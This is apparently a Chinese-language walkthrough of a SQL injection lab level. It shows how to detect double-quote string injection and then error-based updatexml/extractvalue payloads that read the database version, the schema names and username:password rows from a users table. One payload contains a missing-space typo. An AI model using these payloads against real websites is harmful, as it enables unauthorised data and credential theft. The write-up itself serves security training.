一：判断输入类型

首先测试 ?id=1，?id=1'，?id=1"，页面回显均无变化

所以我们采用简单的布尔测试，分别测试数字型，单引号，双引号

然后发现，只有在测试到双引号注入的时候符合关键规律，其他的页面并无变化，即如下代码：

?id=1" and 1=1 --+   # 正常返回
?id=1" and 1=2 --+   # 异常返回，页面为空

 得出结论：第六关为字符型，双引号闭合

二：注入攻击

1.列数

?id=1" order by 3 --+正常
?id=1" order by 4 --+报错

2，获取数据库版本

?id=1" and updatexml(1,concat(0x7e,version()),1) --+

3，获取数据库名

?id=1" and updatexml(1,concat(0x7e,database()),1) --+

 4.获取数据库表名

?id=1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())
),1) --+

 5.获取数据库列名

?id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columnswhere table_name='users' and table_schema=database())
),1) --+

 6.提取users表数据~

?id=1"%20and%20extractvalue(1,concat(0x7e,(select%20concat(username,%27:%27,password)%20from%20users%20limit%200,1)))--+

❀❀❀ 完结撒花！！ ❀❀❀